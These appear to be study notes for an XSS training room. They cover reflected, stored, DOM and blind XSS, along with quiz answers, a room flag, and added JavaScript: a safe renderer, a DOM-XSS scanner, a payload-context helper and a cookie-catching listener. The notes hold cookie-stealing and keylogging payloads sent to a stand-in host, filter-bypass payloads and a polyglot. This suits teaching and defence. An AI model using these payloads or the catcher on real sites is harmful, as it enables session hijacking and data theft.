Intro to Cross Site Scripting
Notes on XSS and Exploiting Cross-Site Scripting Vulnerabilities
TASK 1 - Room Brief
Prerequisites
- Basic understanding of JavaScript
- Understanding of Client-Server requests and responses
Introduction to XSS
- XSS (Cross-Site Scripting): An injection attack in which malicious JavaScript is injected into a web application so that it executes in other users' browsers, with that user's session and privileges.
- Types of XSS:
- Reflected XSS
- Stored XSS
- DOM-Based XSS
- Real-world examples of XSS vulnerabilities found in major applications: Shopify, Steam chat, HackerOne, Infogram.
Questions:
- What does XSS stand for?
- Answer:
Cross-site scripting
TASK 2 - XSS Payloads
What is a Payload?
- The JavaScript code intended to be executed in the target's browser.
- Two parts: the intention (what the JavaScript should do) and the modification (the changes needed to make it execute in the specific reflection context, which differs from site to site).
Examples of XSS Intentions
- Proof of Concept:
- Example:
<script>alert('XSS');</script>
- Session Stealing:
- Example:
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
- Key Logger:
- Example:
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
- Business Logic:
- Example:
<script>user.changeEmail('attacker@hacker.thm');</script>
Questions:
- Which document property could contain the user's session token?
- Answer:
document.cookie
- Which JavaScript method is often used as a Proof Of Concept?
- Answer:
alert
TASK 3 - Reflected XSS
Reflected XSS
- Occurs when user-supplied data in an HTTP request is included in the webpage source without validation or output encoding, so the payload is only present in the response to the request that carried it.
Example Scenario
- Error message from the URL query string is directly included in the page source without validation.
Potential Impact
- Attackers send victims a crafted link (or a form submission) that executes code in the victim's browser.
Testing for Reflected XSS
- Test possible points of entry:
- URL Query String
- URL File Path
- HTTP Headers
Questions:
- Where in a URL is a good place to test for reflected XSS?
- Answer:
parameters
TASK 4 - Stored XSS
Stored XSS
- The XSS payload is stored on the web application (e.g., in a database) and executed when users visit the affected page.
Example Scenario
- Comments on a blog that do not filter out malicious JavaScript.
Potential Impact
- Redirecting users, stealing session cookies, or performing actions as the user.
Testing for Stored XSS
- Test entry points where data is stored and reflected to other users:
- Blog comments
- User profile information
- Website listings
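Added example for Tasks 3 and 4 (not code from the room): the same rendering mistake behind both reflected and stored XSS, beside its fix. The URL, the in-memory comment store and the function names are made up for the example; it runs under Node.js with no web server or database.

```javascript
// Added example, not part of the TryHackMe room. Pure string functions so it
// runs under Node.js without a browser, a web server or a real database.
const comments = []; // constructed stand-in for the blog's comment table

// HTML entity encoding for text placed between tags or inside a quoted attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

// Reflected XSS (Task 3): the ?error= value from the query string is copied
// straight into the response body.
function renderErrorVulnerable(requestUrl) {
  const msg = new URL(requestUrl).searchParams.get('error') || '';
  return `<div class="error">${msg}</div>`;
}
function renderErrorSafe(requestUrl) {
  const msg = new URL(requestUrl).searchParams.get('error') || '';
  return `<div class="error">${escapeHtml(msg)}</div>`;
}

// Stored XSS (Task 4): the comment is saved exactly as submitted and later
// rendered to every visitor. The sink is the same string concatenation.
function storeComment(author, body) {
  comments.push({ author, body });
}
function renderCommentsVulnerable() {
  return comments.map((c) => `<p><b>${c.author}</b>: ${c.body}</p>`).join('\n');
}
function renderCommentsSafe() {
  return comments
    .map((c) => `<p><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</p>`)
    .join('\n');
}

// Crude check used only to show the difference; the real test is a browser.
function hasScriptTag(html) {
  return /<script\b/i.test(html);
}
```

escapeHtml() is only correct for the HTML text and quoted-attribute contexts; data placed inside a JavaScript string, a URL or an event handler needs the encoding of that context instead (see the levels in Task 7).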
Questions:
- How are stored XSS payloads usually stored on a website?
- Answer:
database
TASK 5 - DOM Based XSS
What is the DOM?
- Document Object Model: Represents the page for programs to change the document structure, style, and content.
DOM Based XSS
- The payload is executed by the page's own client-side JavaScript, without a new page being loaded or the data being submitted to backend code; the injected string may never reach the server, so server-side filtering does not catch it.
Example Scenario
- JavaScript reads window.location.hash and writes it to the page without validation.
Potential Impact
- Crafted links can redirect users or steal content from the page.
Testing for DOM Based XSS
- Look for variables the attacker controls (e.g., window.location.x parameters).
- Check how they are handled and whether they are written to the DOM or passed to unsafe methods like eval().
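Added example for Task 5 (not code from the room): the source-to-sink check described above turned into a small script. It greps a constructed client-side script for attacker-controlled sources, follows them through simple variable assignments, and reports the lines where they reach a dangerous sink. The source and sink lists, the sample script and the function names are my own choices; it is regex-based, so the output is a list of candidates for manual review, not proof.

```javascript
// Added example, not part of the TryHackMe room: regex-based source-to-sink
// scan for DOM-based XSS candidates. No scope tracking, no real parsing.

// Values an attacker can set by crafting a link or page name.
const SOURCES = [
  /\blocation\.(hash|search|href|pathname)\b/,
  /\bdocument\.(URL|documentURI|referrer|cookie)\b/,
  /\bwindow\.name\b/,
];

// Places where a string is interpreted as HTML, code or a navigation target.
const SINKS = [
  { name: 'innerHTML', re: /\.(inner|outer)HTML\s*=/ },
  { name: 'insertAdjacentHTML', re: /\.insertAdjacentHTML\s*\(/ },
  { name: 'document.write', re: /\bdocument\.write(ln)?\s*\(/ },
  { name: 'eval', re: /\beval\s*\(/ },
  { name: 'Function', re: /\bnew\s+Function\s*\(/ },
  { name: 'setTimeout(string)', re: /\bset(Timeout|Interval)\s*\(\s*['"`]/ },
  { name: 'location assignment', re: /\blocation(\.href)?\s*=[^=]/ },
];

function scanForDomXss(source) {
  const tainted = new Set();   // identifiers assigned from a source so far
  const findings = [];
  source.split('\n').forEach((raw, idx) => {
    const line = raw.trim();
    const usesSource = SOURCES.some((r) => r.test(line));
    const usesTainted = [...tainted].some((v) => new RegExp(`\\b${v}\\b`).test(line));
    // `x = <tainted expression>` taints x for the rest of the file.
    const assign = line.match(/^(?:var|let|const)?\s*([A-Za-z_][A-Za-z0-9_]*)\s*=[^=]/);
    if (assign && (usesSource || usesTainted)) tainted.add(assign[1]);
    const sink = SINKS.find((s) => s.re.test(line));
    if (sink && (usesSource || usesTainted)) {
      findings.push({ line: idx + 1, sink: sink.name, text: line });
    }
  });
  return findings;
}

// Constructed client-side script modelled on the room's scenario: the hash is
// read, written once via innerHTML (bad), once via textContent (fine), and the
// query string is passed to eval. The setTimeout with a function is not a sink.
const SAMPLE_SCRIPT = [
  "// constructed snippet for the example",
  "var name = decodeURIComponent(window.location.hash.substr(1));",
  "document.getElementById('greeting').innerHTML = 'Hello ' + name;",
  "document.getElementById('safe').textContent = name;",
  "eval(location.search.slice(1));",
  "setTimeout(function () { render(); }, 100);",
].join('\n');
```

Run scanForDomXss(SAMPLE_SCRIPT) and it reports line 3 (innerHTML fed by the tainted variable name) and line 5 (eval fed directly by location.search); the textContent write on line 4 is not reported because it does not parse HTML.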
Questions:
- What unsafe JavaScript method is good to look for in source code?
- Answer:
eval()
TASK 6 - Blind XSS
Blind XSS
- Similar to Stored XSS, but the attacker cannot see the payload being executed.
Example Scenario
- Message content in a support form is not checked and is viewed by staff on a private portal.
Potential Impact
- Extracting staff portal URL, session cookies, or portal contents.
Testing for Blind XSS
- Ensure the payload has a callback (e.g., HTTP request) to know when the code is executed.
- Use tools like XSS Hunter Express for automatic capturing.
Questions:
- What tool can you use to test for Blind XSS?
- Answer:
XSS Hunter Express
- What type of XSS is very similar to Blind XSS?
- Answer:
Stored XSS
TASK 7 - Perfecting your Payload
Crafting Effective Payloads
- Depends on how the input is reflected in the target website's code; the payload must first break out of that context before the JavaScript can run.
- Example payload for a simple XSS alert:
<script>alert('THM');</script>
Testing Levels (each payload is shaped by where the input is reflected):
- Level One (reflected between tags with no filtering):
- Payload:
<script>alert('THM');</script>
- Level Two (reflected inside a double-quoted attribute value; the leading "> closes the attribute and the tag):
- Payload:
"><script>alert('THM');</script>
- Level Three (reflected inside a textarea, whose content is not parsed as HTML until the textarea is closed):
- Payload:
</textarea><script>alert('THM');</script>
- Level Four (reflected inside a single-quoted JavaScript string; the ' closes the string and // comments out the rest of the line):
- Payload:
';alert('THM');//
- Level Five (a filter strips the word "script"; once the inner occurrence is removed, <script> is left behind):
- Payload:
<sscriptcript>alert('THM');</sscriptcript>
- Level Six (reflected as the src of an image tag; rather than opening a new tag, close the value and add an onload handler to the existing tag):
- Payload:
/images/cat.jpg" onload="alert('THM');
Polyglots:
- A single string that can escape attributes, tags, and bypass filters, so one payload can test many reflection contexts at once.
- Example:
/-//*\/'/"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
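Added example for Task 7 (not code from the room): a helper that finds where a probe string is reflected in a response and maps each reflection point to the breakout used by the levels above. The probe string thmxss7, the sample response and all function names are assumptions; it is a heuristic, not an HTML parser, so confirm each suggestion in a browser.

```javascript
// Added example, not part of the TryHackMe room: classify each place a probe
// string is reflected and suggest the matching breakout payload.
const PROBE = 'thmxss7'; // assumed unique marker; submit it as the input first

// Returns the quote character still open at the end of `s`, or null.
function lastUnclosedQuote(s) {
  let open = null;
  for (let i = 0; i < s.length; i++) {
    const c = s[i];
    if (open) {
      if (c === '\\') { i++; continue; } // skip an escaped character
      if (c === open) open = null;
    } else if (c === '"' || c === "'") {
      open = c;
    }
  }
  return open;
}

// True when the end of `before` lies inside <tag>...</tag> (raw-text elements).
function insideRawText(before, tag) {
  const lower = before.toLowerCase();
  return lower.lastIndexOf('<' + tag) > lower.lastIndexOf('</' + tag);
}

// `before` is everything in the response that precedes one reflection.
function classifyReflection(before) {
  if (insideRawText(before, 'script')) {
    const js = before.slice(before.toLowerCase().lastIndexOf('<script'));
    const q = lastUnclosedQuote(js);
    return q
      ? { context: 'js-string', payload: `${q};alert('THM');//` }      // level four
      : { context: 'js-code', payload: "alert('THM');" };
  }
  for (const tag of ['textarea', 'title', 'style']) {
    if (insideRawText(before, tag)) {
      return { context: tag, payload: `</${tag}><script>alert('THM');</script>` }; // level three
    }
  }
  if (before.lastIndexOf('<') > before.lastIndexOf('>')) {
    const q = lastUnclosedQuote(before.slice(before.lastIndexOf('<')));
    if (q) {
      return {
        context: 'attribute-value',
        payload: `${q}><script>alert('THM');</script>`, // level two: close attribute and tag
        alternative: `${q} onload=${q}alert('THM');`,    // level six: stay inside the existing tag
      };
    }
    // unquoted attribute: add a handler; which event fires depends on the element
    return { context: 'tag', payload: " onmouseover=\"alert('THM')\"" };
  }
  return { context: 'html-body', payload: "<script>alert('THM');</script>" }; // level one
}

function findReflections(html, probe = PROBE) {
  const hits = [];
  for (let i = html.indexOf(probe); i !== -1; i = html.indexOf(probe, i + probe.length)) {
    hits.push({ offset: i, ...classifyReflection(html.slice(0, i)) });
  }
  return hits;
}

// Constructed response that reflects the probe in four different contexts.
const SAMPLE_RESPONSE = [
  '<html><head><title>Search</title></head><body>',
  '<p>You searched for: thmxss7</p>',
  '<input type="text" value="thmxss7">',
  '<textarea name="comment">thmxss7</textarea>',
  "<script>var term = 'thmxss7';</script>",
  '</body></html>',
].join('\n');
```

findReflections(SAMPLE_RESPONSE) returns four hits whose contexts are html-body, attribute-value, textarea and js-string, with the payloads from Levels One to Four (and the Level Six style handler as the alternative for the attribute case). Level Five is a filter, not a context, so it is not something this helper can detect; compare the reflected payload with what was sent to spot stripped words.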
Questions:
- What is the flag you received from level six?
- Answer:
THM{XSS_MASTER}
TASK 8 - Practical Example (Blind XSS)
Testing Blind XSS
- Set up a listening server using Netcat:
```bash
nc -nlvp 9001
```
- Craft a payload that extracts the user's cookies and exfiltrates them to the listening server.
Example of Crafting and Testing Payloads in a Practical Scenario
- Use the payload to test whether it executes and to extract useful information; with blind XSS the request arriving at the listener is the only signal that the code ran.
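Added example for Tasks 6 and 8 (not code from the room): a Node.js listener that can stand in for netcat. It parses the callbacks made by the Task 2 payloads (/steal?cookie= and /log?key=), reverses the btoa() encoding and logs the Referer header, which is what gives away the private portal's URL in the blind XSS scenario. The endpoint names come from Task 2; the sample cookie, the placeholder base URL and the CATCHER_PORT variable are assumptions.

```javascript
// Added example, not part of the TryHackMe room: a callback catcher for
// blind XSS payloads of the form fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie)).

const BASE64 = /^[A-Za-z0-9+/]+={0,2}$/;

// Parse one request path such as '/steal?cookie=c2Vzc2lvbj1hYmM=' (base64 of 'session=abc').
// The payloads send btoa() output without URL-encoding it, so a '+' in the
// base64 arrives as a space after query decoding; restore it before decoding.
function parseCallback(pathWithQuery) {
  const url = new URL(pathWithQuery, 'http://catcher.invalid'); // base only so a relative path parses
  const fields = {};
  for (const [key, value] of url.searchParams) {
    const candidate = value.replace(/ /g, '+');
    fields[key] = BASE64.test(candidate)
      ? Buffer.from(candidate, 'base64').toString('utf8')
      : value; // not base64: keep it as sent
  }
  return { endpoint: url.pathname, fields };
}

// Start the listener. Every hit is printed as one JSON line so it can be
// grepped or piped into jq later.
function startCatcher(port) {
  const http = require('http'); // required here so parseCallback stays usable on its own
  const server = http.createServer((req, res) => {
    const hit = parseCallback(req.url);
    console.log(JSON.stringify({
      time: new Date().toISOString(),
      from: req.socket.remoteAddress,
      endpoint: hit.endpoint,
      fields: hit.fields,
      referer: req.headers.referer || null,        // page the payload fired on (the staff portal URL)
      userAgent: req.headers['user-agent'] || null,
    }));
    res.writeHead(200, { 'Access-Control-Allow-Origin': '*', 'Content-Type': 'text/plain' });
    res.end('ok');
  });
  server.listen(port, () => console.log(`catcher listening on :${port}`));
  return server;
}

// Constructed sample: what /steal?cookie= looks like for the cookie "session=abc123".
const SAMPLE_HIT = '/steal?cookie=' + Buffer.from('session=abc123').toString('base64');

// Run with: CATCHER_PORT=9001 node catcher.js   (same port the netcat command above uses)
if (process.env.CATCHER_PORT) startCatcher(Number(process.env.CATCHER_PORT));
```

The Referer header is only present if the portal's referrer policy allows it; if it is missing, have the payload send document.location explicitly instead. The space-to-plus fix matters in practice: cookies whose base64 contains '+' would otherwise decode to garbage.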
These notes cover the essentials of understanding and exploiting XSS vulnerabilities, from basic concepts to practical application and testing strategies.